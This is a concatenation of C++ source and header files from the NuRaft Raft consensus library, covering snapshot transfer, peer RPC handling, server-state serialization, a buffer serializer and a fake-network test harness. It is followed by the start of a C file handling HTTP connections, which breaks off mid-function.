p_db("peer: %d, obj_idx: %ld, user_snp_ctx %p\n",
dst_id, obj_idx, user_snp_ctx);
ulong snp_log_idx = elem->snapshot_->get_last_log_idx();
ulong snp_log_term = elem->snapshot_->get_last_log_term();
// ---- lock released
lock.unlock();
ptr<buffer> data = nullptr;
bool is_last_request = false;
int rc = elem->raft_->state_machine_->read_logical_snp_obj
( *elem->snapshot_, user_snp_ctx, obj_idx,
data, is_last_request );
if (rc < 0) {
// Snapshot read failed.
p_wn( "reading snapshot (idx %lu, term %lu, object %lu) "
"for peer %d failed: %d",
snp_log_idx, snp_log_term, obj_idx, dst_id, rc );
recur_lock(elem->raft_->lock_);
auto entry = elem->raft_->peers_.find(dst_id);
if (entry != elem->raft_->peers_.end()) {
// If normal member (already in the peer list):
// reset the `sync_ctx` so as to retry with the newer version.
elem->raft_->clear_snapshot_sync_ctx(*elem->dst_);
} else {
// If it is joing the server (not in the peer list),
// enable HB temporarily to retry the request.
elem->raft_->srv_to_join_snp_retry_required_ = true;
elem->raft_->enable_hb_for_peer(*elem->raft_->srv_to_join_);
}
continue;
}
if (data) data->pos(0);
// Send snapshot message with the given response handler.
recur_lock(elem->raft_->lock_);
ulong term = elem->raft_->state_->get_term();
ulong commit_idx = elem->raft_->quick_commit_index_;
std::unique_ptr<snapshot_sync_req> sync_req(
new snapshot_sync_req( elem->snapshot_, obj_idx,
data, is_last_request ) );
ptr<req_msg> req( cs_new<req_msg>
( term,
msg_type::install_snapshot_request,
elem->raft_->id_,
dst_id,
elem->snapshot_->get_last_log_term(),
elem->snapshot_->get_last_log_idx(),
commit_idx ) );
req->log_entries().push_back( cs_new<log_entry>
( term,
sync_req->serialize(),
log_val_type::snp_sync_req ) );
if (elem->dst_->make_busy()) {
elem->dst_->set_rsv_msg(nullptr, nullptr);
elem->dst_->send_req(elem->dst_, req, elem->handler_);
elem->dst_->reset_ls_timer();
p_tr("bg thread sent message to peer %d", dst_id);
} else {
p_db("peer %d is busy, push the request back to queue", dst_id);
reqs_to_return.push_back(elem);
}
}
{
auto_lock(queue_lock_);
// Remove elements in `reqs` from `queue_`.
for (auto& entry: reqs) {
auto e2 = queue_.begin();
while (e2 != queue_.end()) {
if (*e2 == entry) {
e2 = queue_.erase(e2);
break;
} else {
e2++;
}
}
}
// Return elements in `reqs_to_return` to `queue_` for retrying.
for (auto& entry: reqs_to_return) {
queue_.push_back(entry);
}
}
} while (!terminating_);
}
}
<|start_filename|>include/libnuraft/snapshot_sync_ctx.hxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#ifndef _SNAPSHOT_SYNC_CTX_HXX_
#define _SNAPSHOT_SYNC_CTX_HXX_
#include "basic_types.hxx"
#include "event_awaiter.h"
#include "internal_timer.hxx"
#include "pp_util.hxx"
#include "ptr.hxx"
#include <functional>
#include <list>
#include <mutex>
#include <thread>
#include <unordered_map>
class EventAwaiter;
namespace nuraft {
class peer;
class raft_server;
class resp_msg;
class rpc_exception;
class snapshot;
class snapshot_sync_ctx {
public:
snapshot_sync_ctx(const ptr<snapshot>& s,
int peer_id,
ulong timeout_ms,
ulong offset = 0L);
__nocopy__(snapshot_sync_ctx);
public:
const ptr<snapshot>& get_snapshot() const { return snapshot_; }
ulong get_offset() const { return offset_; }
ulong get_obj_idx() const { return obj_idx_; }
void*& get_user_snp_ctx() { return user_snp_ctx_; }
void set_offset(ulong offset);
void set_obj_idx(ulong obj_idx) { obj_idx_ = obj_idx; }
void set_user_snp_ctx(void* _user_snp_ctx) { user_snp_ctx_ = _user_snp_ctx; }
timer_helper& get_timer() { return timer_; }
private:
void io_thread_loop();
/**
* Destination peer ID.
*/
int32_t peer_id_;
/**
* Pointer to snapshot.
*/
ptr<snapshot> snapshot_;
/**
* Current cursor of snapshot.
* Can be used for either byte offset or object index,
* but the legacy raw snapshot (offset_) is deprecated.
*/
union {
ulong offset_;
ulong obj_idx_;
};
/**
* User-defined snapshot context, given by the state machine.
*/
void* user_snp_ctx_;
/**
* Timer to check snapshot transfer timeout.
*/
timer_helper timer_;
};
// Singleton class.
class snapshot_io_mgr {
public:
static snapshot_io_mgr& instance() {
static snapshot_io_mgr mgr;
return mgr;
};
/**
* Push a snapshot read request to the queue.
*
* @param r Raft server instance.
* @param p Peer instance.
* @param h Response handler.
* @return `true` if succeeds (when there is no pending request for the same peer).
*/
bool push(ptr<raft_server> r,
ptr<peer> p,
std::function< void(ptr<resp_msg>&, ptr<rpc_exception>&) >& h);
/**
* Invoke IO thread.
*/
void invoke();
/**
* Drop all pending requests belonging to the given Raft instance.
*
* @param r Raft server instance.
*/
void drop_reqs(raft_server* r);
/**
* Check if there is pending request for the given peer.
*
* @param r Raft server instance.
* @param srv_id Server ID to check.
* @return `true` if pending request exists.
*/
bool has_pending_request(raft_server* r, int srv_id);
/**
* Shutdown the global snapshot IO manager.
*/
void shutdown();
private:
struct io_queue_elem;
snapshot_io_mgr();
~snapshot_io_mgr();
void async_io_loop();
bool push(ptr<io_queue_elem>& elem);
/**
* A dedicated thread for reading snapshot object.
*/
std::thread io_thread_;
/**
* Event awaiter for `io_thread_`.
*/
ptr<EventAwaiter> io_thread_ea_;
/**
* `true` if we are closing this context.
*/
std::atomic<bool> terminating_;
/**
* Request queue. Allow only one request per peer at a time.
*/
std::list< ptr<io_queue_elem> > queue_;
/**
* Lock for `queue_`.
*/
std::mutex queue_lock_;
};
}
#endif //_SNAPSHOT_SYNC_CTX_HXX_
<|start_filename|>src/peer.cxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#include "peer.hxx"
#include "debugging_options.hxx"
#include "tracer.hxx"
#include <unordered_set>
namespace nuraft {
void peer::send_req( ptr<peer> myself,
ptr<req_msg>& req,
rpc_handler& handler )
{
if (abandoned_) {
p_er("peer %d has been shut down, cannot send request",
config_->get_id());
return;
}
if (req) {
p_tr("send req %d -> %d, type %s",
req->get_src(),
req->get_dst(),
msg_type_to_string( req->get_type() ).c_str() );
}
ptr<rpc_result> pending = cs_new<rpc_result>(handler);
ptr<rpc_client> rpc_local = nullptr;
{ std::lock_guard<std::mutex> l(rpc_protector_);
if (!rpc_) {
// Nothing will be sent, immediately free it
// to serve next operation.
p_tr("rpc local is null");
set_free();
return;
}
rpc_local = rpc_;
}
rpc_handler h = (rpc_handler)std::bind
( &peer::handle_rpc_result,
this,
myself,
rpc_local,
req,
pending,
std::placeholders::_1,
std::placeholders::_2 );
if (rpc_local) {
rpc_local->send(req, h);
}
}
// WARNING:
// We should have the shared pointer of itself (`myself`)
// and pointer to RPC client (`my_rpc_client`),
// for the case when
// 1) this peer is removed before this callback function is invoked. OR
// 2) RPC client has been reset and re-connected.
void peer::handle_rpc_result( ptr<peer> myself,
ptr<rpc_client> my_rpc_client,
ptr<req_msg>& req,
ptr<rpc_result>& pending_result,
ptr<resp_msg>& resp,
ptr<rpc_exception>& err )
{
std::unordered_set<int> msg_types_to_free( {
msg_type::append_entries_request,
msg_type::install_snapshot_request,
msg_type::request_vote_request,
msg_type::pre_vote_request,
msg_type::leave_cluster_request,
msg_type::custom_notification_request,
msg_type::reconnect_request,
msg_type::priority_change_request
} );
if (abandoned_) {
p_in("peer %d has been shut down, ignore response.", config_->get_id());
return;
}
if (req) {
p_tr( "resp of req %d -> %d, type %s, %s",
req->get_src(),
req->get_dst(),
msg_type_to_string( req->get_type() ).c_str(),
(err) ? err->what() : "OK" );
}
if (err == nilptr) {
// Succeeded.
{ std::lock_guard<std::mutex> l(rpc_protector_);
// The same as below, freeing busy flag should be done
// only if the RPC hasn't been changed.
uint64_t cur_rpc_id = rpc_ ? rpc_->get_id() : 0;
uint64_t given_rpc_id = my_rpc_client ? my_rpc_client->get_id() : 0;
if (cur_rpc_id != given_rpc_id) {
p_wn( "[EDGE CASE] got stale RPC response from %d: "
"current %p (%zu), from parameter %p (%zu). "
"will ignore this response",
config_->get_id(),
rpc_.get(),
cur_rpc_id,
my_rpc_client.get(),
given_rpc_id );
return;
}
// WARNING:
// `set_free()` should be protected by `rpc_protector_`, otherwise
// it may free the peer even though new RPC client is already created.
if ( msg_types_to_free.find(req->get_type()) != msg_types_to_free.end() ) {
set_free();
}
}
reset_active_timer();
{
auto_lock(lock_);
resume_hb_speed();
}
ptr<rpc_exception> no_except;
resp->set_peer(myself);
pending_result->set_result(resp, no_except);
reconn_backoff_.reset();
reconn_backoff_.set_duration_ms(1);
} else {
// Failed.
// NOTE: Explicit failure is also treated as an activity
// of that connection.
reset_active_timer();
{
auto_lock(lock_);
slow_down_hb();
}
ptr<resp_msg> no_resp;
pending_result->set_result(no_resp, err);
// Destroy this connection, we MUST NOT re-use existing socket.
// Next append operation will create a new one.
{ std::lock_guard<std::mutex> l(rpc_protector_);
uint64_t cur_rpc_id = rpc_ ? rpc_->get_id() : 0;
uint64_t given_rpc_id = my_rpc_client ? my_rpc_client->get_id() : 0;
if (cur_rpc_id == given_rpc_id) {
rpc_.reset();
if ( msg_types_to_free.find(req->get_type()) !=
msg_types_to_free.end() ) {
set_free();
}
} else {
// WARNING (MONSTOR-9378):
// RPC client has been reset before this request returns
// error. Those two are different instances and we
// SHOULD NOT reset the new one.
p_wn( "[EDGE CASE] RPC for %d has been reset before "
"returning error: current %p (%zu), from parameter %p (%zu)",
config_->get_id(),
rpc_.get(),
cur_rpc_id,
my_rpc_client.get(),
given_rpc_id );
}
}
}
}
bool peer::recreate_rpc(ptr<srv_config>& config,
context& ctx)
{
if (abandoned_) {
p_tr("peer %d is abandoned", config->get_id());
return false;
}
ptr<rpc_client_factory> factory = nullptr;
{ std::lock_guard<std::mutex> l(ctx.ctx_lock_);
factory = ctx.rpc_cli_factory_;
}
if (!factory) {
p_tr("client factory is empty");
return false;
}
std::lock_guard<std::mutex> l(rpc_protector_);
bool backoff_timer_disabled =
debugging_options::get_instance()
.disable_reconn_backoff_.load(std::memory_order_relaxed);
if (backoff_timer_disabled) {
p_tr("reconnection back-off timer is disabled");
}
// To avoid too frequent reconnection attempt,
// we use exponential backoff (x2) from 1 ms to heartbeat interval.
if (backoff_timer_disabled || reconn_backoff_.timeout()) {
reconn_backoff_.reset();
size_t new_duration_ms = reconn_backoff_.get_duration_us() / 1000;
new_duration_ms = std::min( hb_interval_, (int32)new_duration_ms * 2 );
if (!new_duration_ms) new_duration_ms = 1;
reconn_backoff_.set_duration_ms(new_duration_ms);
rpc_ = factory->create_client(config->get_endpoint());
p_tr("%p reconnect peer %zu", rpc_.get(), config_->get_id());
// WARNING:
// A reconnection attempt should be treated as an activity,
// hence reset timer.
reset_active_timer();
set_free();
set_manual_free();
return true;
} else {
p_tr("skip reconnect this time");
}
return false;
}
void peer::shutdown() {
// Should set the flag to block all incoming requests.
abandoned_ = true;
// Cut off all shared pointers related to ASIO and Raft server.
scheduler_.reset();
{ // To guarantee atomic reset
// (race between send_req()).
std::lock_guard<std::mutex> l(rpc_protector_);
rpc_.reset();
}
hb_task_.reset();
}
} // namespace nuraft;
<|start_filename|>include/libnuraft/debugging_options.hxx<|end_filename|>
#pragma once
#include <atomic>
#include <cstdlib>
#include <cstddef>
namespace nuraft {
struct debugging_options {
debugging_options()
: disable_reconn_backoff_(false)
, handle_cli_req_sleep_us_(0)
{}
static debugging_options& get_instance() {
static debugging_options opt;
return opt;
}
/**
* If `true`, reconnection back-off timer will be disabled,
* and there will be frequent reconnection attempts for every
* request to follower.
*/
std::atomic<bool> disable_reconn_backoff_;
/**
* If non-zero, the thread will sleep the given amount of time
* inside `handle_cli_req` function.
*/
std::atomic<size_t> handle_cli_req_sleep_us_;
};
}
<|start_filename|>include/libnuraft/srv_state.hxx<|end_filename|>
/************************************************************************
Modifications Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Original Copyright:
See URL: https://github.com/datatechnology/cornerstone
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#ifndef _SRV_STATE_HXX_
#define _SRV_STATE_HXX_
#include "basic_types.hxx"
#include "buffer.hxx"
#include "buffer_serializer.hxx"
#include <atomic>
#include <cassert>
#include <functional>
namespace nuraft {
class srv_state {
public:
srv_state()
: term_(0L)
, voted_for_(-1)
, election_timer_allowed_(true)
{}
srv_state(ulong term, int voted_for, bool et_allowed)
: term_(term)
, voted_for_(voted_for)
, election_timer_allowed_(et_allowed)
{}
/**
* Callback function type for increasing term.
*
* @param Current term.
* @return New term, it should be greater than current term.
*/
using inc_term_func = std::function< ulong(ulong) >;
__nocopy__(srv_state);
public:
static ptr<srv_state> deserialize(buffer& buf) {
if (buf.size() > sz_ulong + sz_int) {
return deserialize_v1p(buf);
}
// Backward compatibility.
return deserialize_v0(buf);
}
static ptr<srv_state> deserialize_v0(buffer& buf) {
ulong term = buf.get_ulong();
int voted_for = buf.get_int();
return cs_new<srv_state>(term, voted_for, true);
}
static ptr<srv_state> deserialize_v1p(buffer& buf) {
buffer_serializer bs(buf);
uint8_t ver = bs.get_u8();
(void)ver;
ulong term = bs.get_u64();
int voted_for = bs.get_i32();
bool et_allowed = (bs.get_u8() == 1);
return cs_new<srv_state>(term, voted_for, et_allowed);
}
void set_inc_term_func(inc_term_func to) {
inc_term_cb_ = to;
}
ulong get_term() const {
return term_;
}
void set_term(ulong term) {
term_ = term;
}
void inc_term() {
if (inc_term_cb_) {
ulong new_term = inc_term_cb_(term_);
assert(new_term > term_);
term_ = new_term;
return;
}
term_++;
}
int get_voted_for() const {
return voted_for_;
}
void set_voted_for(int voted_for) {
voted_for_ = voted_for;
}
bool is_election_timer_allowed() const {
return election_timer_allowed_;
}
void allow_election_timer(bool to) {
election_timer_allowed_ = to;
}
ptr<buffer> serialize() const {
return serialize_v1p(CURRENT_VERSION);
}
ptr<buffer> serialize_v0() const {
ptr<buffer> buf = buffer::alloc(sz_ulong + sz_int);
buf->put(term_);
buf->put(voted_for_);
buf->pos(0);
return buf;
}
ptr<buffer> serialize_v1p(size_t version) const {
// << Format >>
// version 1 byte
// term 8 bytes
// voted_for 4 bytes
// election timer 1 byte
ptr<buffer> buf = buffer::alloc( sizeof(uint8_t) +
sizeof(uint64_t) +
sizeof(int32_t) +
sizeof(uint8_t) );
buffer_serializer bs(buf);
bs.put_u8(version);
bs.put_u64(term_);
bs.put_i32(voted_for_);
bs.put_u8( election_timer_allowed_ ? 1 : 0 );
return buf;
}
private:
const uint8_t CURRENT_VERSION = 1;
/**
* Term.
*/
std::atomic<ulong> term_;
/**
* Server ID that this server voted for.
* `-1` if not voted.
*/
std::atomic<int> voted_for_;
/**
* `true` if election timer is allowed.
*/
std::atomic<bool> election_timer_allowed_;
/**
* Custom callback function for increasing term.
* If not given, term will be increased by 1.
*/
std::function< ulong(ulong) > inc_term_cb_;
};
}
#endif
<|start_filename|>include/libnuraft/buffer_serializer.hxx<|end_filename|>
/************************************************************************
Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#pragma once
#include "pp_util.hxx"
#include "ptr.hxx"
#include <cstdint>
#include <string>
namespace nuraft {
class buffer;
class buffer_serializer {
public:
enum endianness {
LITTLE = 0x0,
BIG = 0x1,
};
buffer_serializer(buffer& src_buf,
endianness endian = LITTLE);
buffer_serializer(ptr<buffer>& src_buf_ptr,
endianness endian = LITTLE);
__nocopy__(buffer_serializer);
public:
/**
* Get the current position of cursor inside buffer.
*
* @return Position of cursor.
*/
inline size_t pos() const { return pos_; }
/**
* Get the size of given buffer.
*
* @return Size of buffer.
*/
size_t size() const;
/**
* Set the position of cursor.
*
* @param p New position.
*/
void pos(size_t new_pos);
/**
* Get the memory pointer to the current position.
*
* @return Pointer to the current position.
*/
void* data() const;
/**
* Put 1-byte unsigned integer.
*
* @param val 1-byte unsigned integer.
*/
void put_u8(uint8_t val);
/**
* Put 2-byte unsigned integer.
*
* @param val 2-byte unsigned integer.
*/
void put_u16(uint16_t val);
/**
* Put 4-byte unsigned integer.
*
* @param val 4-byte unsigned integer.
*/
void put_u32(uint32_t val);
/**
* Put 8-byte unsigned integer.
*
* @param val 8-byte unsigned integer.
*/
void put_u64(uint64_t val);
/**
* Put 1-byte signed integer.
*
* @param val 1-byte signed integer.
*/
void put_i8(int8_t val);
/**
* Put 2-byte signed integer.
*
* @param val 2-byte signed integer.
*/
void put_i16(int16_t val);
/**
* Put 4-byte signed integer.
*
* @param val 4-byte signed integer.
*/
void put_i32(int32_t val);
/**
* Put 8-byte signed integer.
*
* @param val 8-byte signed integer.
*/
void put_i64(int64_t val);
/**
* Put a byte array.
*
* WARNING:
* It does not put the given length info,
* so caller should know the length of byte array in advance
* before calling `get_raw(size_t)`.
*
* If not, please use `put_bytes(const void* raw_ptr, size_t len);`.
*
* @param raw_ptr Pointer to the byte array.
* @param len Length of the byte array.
*/
void put_raw(const void* raw_ptr, size_t len);
/**
* Put given buffer.
* If given buffer's position is not 0, only data
* after that position will be copied.
*
* WARNING:
* It does not put length info of given buffer,
* so caller should know the length of buffer in advance
* before calling `get_buffer(ptr<buffer>)`.
*
* If not, please use `put_bytes(const void* raw_ptr, size_t len);`.
*
* @param buf Buffer.
*/
void put_buffer(const buffer& buf);
/**
* Put a byte array.
* This function will put 4-byte length first, and then
* the actual byte array next.
*
* @param raw_ptr Pointer to the byte array.
* @param len Length of the byte array.
*/
void put_bytes(const void* raw_ptr, size_t len);
/**
* Put a string.
* This function will put 4-byte length first, and then
* the actual string next.
*
* @param str String.
*/
void put_str(const std::string& str);
/**
* Put a C-style string, which ends with NULL character.
*
* If you want to put generic binary,
* please use `put(const byte*, size_t)`.
*
* @param str String.
*/
void put_cstr(const char* str);
/**
* Get 1-byte unsigned integer.
*
* @return 1-byte unsinged integer.
*/
uint8_t get_u8();
/**
* Get 2-byte unsigned integer.
*
* @return 2-byte unsinged integer.
*/
uint16_t get_u16();
/**
* Get 4-byte unsigned integer.
*
* @return 4-byte unsinged integer.
*/
uint32_t get_u32();
/**
* Get 8-byte unsigned integer.
*
* @return 8-byte unsinged integer.
*/
uint64_t get_u64();
/**
* Get 1-byte signed integer.
*
* @return 1-byte singed integer.
*/
int8_t get_i8();
/**
* Get 2-byte signed integer.
*
* @return 2-byte singed integer.
*/
int16_t get_i16();
/**
* Get 4-byte signed integer.
*
* @return 4-byte singed integer.
*/
int32_t get_i32();
/**
* Get 8-byte signed integer.
*
* @return 8-byte singed integer.
*/
int64_t get_i64();
/**
* Read byte array of given size.
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @param len Size to read.
* @return Pointer to the starting point of byte array.
*/
void* get_raw(size_t len);
/**
* Read byte array of given buffer's size,
* and copy it to the given buffer.
* If buffer's position is not zero, data will be copied
* starting from that position.
*
* @param dst Buffer where the data will be stored.
*/
void get_buffer(ptr<buffer>& dst);
/**
* Read 4-byte length followed by byte array, and then return them.
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @param[out] len Size of returned byte array.
* @return Pointer to the starting point of byte array.
*/
void* get_bytes(size_t& len);
/**
* Read 4-byte length followed by string, and then return it
* as a string instance.
*
* @return String instance.
*/
std::string get_str();
/**
* Read C-style string (null terminated).
* It will NOT allocate a new memory, but return the
* reference to the memory inside buffer only.
*
* @return C-style string.
*/
const char* get_cstr();
private:
bool is_valid(size_t len) const;
// Endianness.
endianness endian_;
// Reference to buffer to read or write.
buffer& buf_;
// Current position.
size_t pos_;
};
}
<|start_filename|>tests/unit/fake_network.hxx<|end_filename|>
/************************************************************************
Copyright 2017-2019 eBay Inc.
Author/Developer(s): <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**************************************************************************/
#pragma once
#include "nuraft.hxx"
#include <map>
#include <unordered_map>
class SimpleLogger;
namespace nuraft {
class FakeClient;
class FakeNetworkBase;
class FakeNetwork
: public rpc_client_factory
, public rpc_listener
, public std::enable_shared_from_this<FakeNetwork>
{
public:
FakeNetwork(const std::string& _endpoint,
ptr<FakeNetworkBase>& _base);
struct ReqPkg {
ReqPkg(ptr<req_msg>& _req, rpc_handler& _when_done)
: req(_req), whenDone(_when_done)
{}
ptr<req_msg> req;
rpc_handler whenDone;
};
struct RespPkg {
RespPkg(ptr<resp_msg>& _resp, rpc_handler& _when_done)
: resp(_resp), whenDone(_when_done)
{}
ptr<resp_msg> resp;
rpc_handler whenDone;
};
FakeNetworkBase* getBase() const { return base.get(); }
std::string getEndpoint() const { return myEndpoint; }
ptr<rpc_client> create_client(const std::string& endpoint);
void listen(ptr<msg_handler>& handler);
ptr<resp_msg> gotMsg(ptr<req_msg>& msg);
bool execReqResp(const std::string& endpoint = std::string());
ptr<FakeClient> findClient(const std::string& endpoint);
bool delieverReqTo(const std::string& endpoint,
bool random_order = false);
void delieverAllTo(const std::string& endpoint);
bool makeReqFail(const std::string& endpoint,
bool random_order = false);
void makeReqFailAll(const std::string& endpoint);
bool handleRespFrom(const std::string& endpoint,
bool random_order = false);
void handleAllFrom(const std::string& endpoint);
size_t getNumPendingReqs(const std::string& endpoint);
size_t getNumPendingResps(const std::string& endpoint);
void goesOffline() { online = false; }
void goesOnline() { online = true; }
bool isOnline() const { return online; }
void stop();
void shutdown();
private:
std::string myEndpoint;
ptr<FakeNetworkBase> base;
ptr<msg_handler> handler;
// NOTE: We don't use `unordered_map` as the order of traversal
// will be different according to platforms. We should make
// the test deterministic.
std::map< std::string, ptr<FakeClient> > clients;
std::mutex clientsLock;
std::list< ptr<FakeClient> > staleClients;
bool online;
};
class FakeNetworkBase {
public:
FakeNetworkBase();
~FakeNetworkBase() { destroy(); }
void destroy();
void addNetwork(ptr<FakeNetwork>& net);
void removeNetwork(const std::string& endpoint);
FakeNetwork* findNetwork(const std::string& endpoint);
SimpleLogger* getLogger() const { return myLog; }
private:
// <endpoint, network instance>
std::map<std::string, ptr<FakeNetwork>> nets;
SimpleLogger* myLog;
};
class FakeClient : public rpc_client {
friend class FakeNetwork;
public:
FakeClient(FakeNetwork* mother,
FakeNetwork* dst);
~FakeClient();
void send(ptr<req_msg>& req, rpc_handler& when_done, uint64_t send_timeout_ms = 0);
void dropPackets();
bool isDstOnline();
uint64_t get_id() const;
bool is_abandoned() const;
private:
uint64_t myId;
FakeNetwork* motherNet;
FakeNetwork* dstNet;
std::list<FakeNetwork::ReqPkg> pendingReqs;
std::list<FakeNetwork::RespPkg> pendingResps;
};
class FakeTimer : public delayed_task_scheduler {
public:
FakeTimer(const std::string& endpoint,
SimpleLogger* logger = nullptr);
void schedule(ptr<delayed_task>& task, int32 milliseconds);
void cancel(ptr<delayed_task>& task);
void invoke(int type);
size_t getNumPendingTasks(int type = -1);
private:
void cancel_impl(ptr<delayed_task>& task);
std::string myEndpoint;
std::mutex tasksLock;
std::list< ptr<delayed_task> > tasks;
SimpleLogger* myLog;
};
} // namespace nuraft;
| fankux/NuRaft |
<|start_filename|>src/http_con.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_srv_io.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_pump.h"
#include "http_ssl.h"
extern HTTPMgmt * gp_httpmgmt;
int http_con_cmp_http_con(void * a, void * b)
{
HTTPCon * acon = (HTTPCon *)a;
HTTPCon * bcon = (HTTPCon *)b;
if (!acon || !bcon) return -1;
if (acon->conid == bcon->conid) return 0;
if (acon->conid > bcon->conid) return 1;
return -1;
}
int http_con_cmp_conid (void * a, void * pat)
{
HTTPCon * pcon = (HTTPCon *)a;
ulong cid = *(ulong *)pat;
if (!pcon || !pat) return -1;
if (pcon->conid == cid) return 0;
if (pcon->conid > cid) return 1;
return -1;
}
ulong http_con_hash_func (void * key)
{
ulong cid = *(ulong *)key;
return cid;
}
int http_con_init (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
pcon->hl = NULL;
pcon->casetype = 0x00;
pcon->reqdiag = NULL;
pcon->reqdiagobj = NULL;
pcon->conid = 0;
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
memset(&pcon->srcip, 0, sizeof(pcon->srcip));
pcon->srcport = 0;
memset(&pcon->dstip, 0, sizeof(pcon->dstip));
pcon->dstport = 0;
InitializeCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
#endif
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
if (pcon->rcvstream == NULL)
pcon->rcvstream = frame_new(8192);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->stamp = 0;
pcon->createtime = 0;
pcon->transbgn = 0;
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
pcon->retrytimes = 0;
pcon->reqnum = 0;
pcon->resnum = 0;
pcon->keepalive = 0;
pcon->ssl_link = 0;
pcon->ssl_handshaked = 0;
pcon->transact = 0;
pcon->httptunnel = 0;
pcon->tunnelself = 0;
if (pcon->msg) {
pcon->msg = NULL;
}
InitializeCriticalSection(&pcon->msglistCS);
if (pcon->msg_list == NULL) {
pcon->msg_list = arr_new(4);
}
while (arr_num(pcon->msg_list) > 0)
http_msg_close(arr_pop(pcon->msg_list));
arr_zero(pcon->msg_list);
pcon->srv = NULL;
return 0;
}
int http_con_free (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
if (pcon->msg) {
pcon->msg = NULL;
}
DeleteCriticalSection(&pcon->rcvCS);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
if (pcon->ssl_link) {
if (pcon->ssl) {
http_ssl_free(pcon->ssl);
pcon->ssl = NULL;
}
}
#endif
frame_delete(&pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
DeleteCriticalSection(&pcon->msglistCS);
arr_free(pcon->msg_list);
kfree(pcon);
return 0;
}
void * http_con_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
if (!mgmt) return NULL;
pcon = bpool_fetch(mgmt->con_pool);
if (!pcon) {
pcon = kzalloc(sizeof(*pcon));
if (!pcon) return NULL;
pcon->mgmt = mgmt;
http_con_init(pcon);
}
EnterCriticalSection(&mgmt->conCS);
pcon->conid = mgmt->conid++;
LeaveCriticalSection(&mgmt->conCS);
http_mgmt_con_add(mgmt, pcon);
pcon->mgmt = mgmt;
pcon->pcore = mgmt->pcore;
return pcon;
}
int http_con_recycle (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)gp_httpmgmt;
if (pcon->casetype == HTTP_CLIENT) {
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
http_msg_close(msg);
}
arr_zero(pcon->msg_list);
pcon->msg = NULL;
} else {
while (arr_num(pcon->msg_list) > 0) {
msg = arr_pop(pcon->msg_list);
if (msg && msg->tear_down_notify)
(*msg->tear_down_notify)(msg, msg->tear_down_para);
http_msg_close(msg);
}
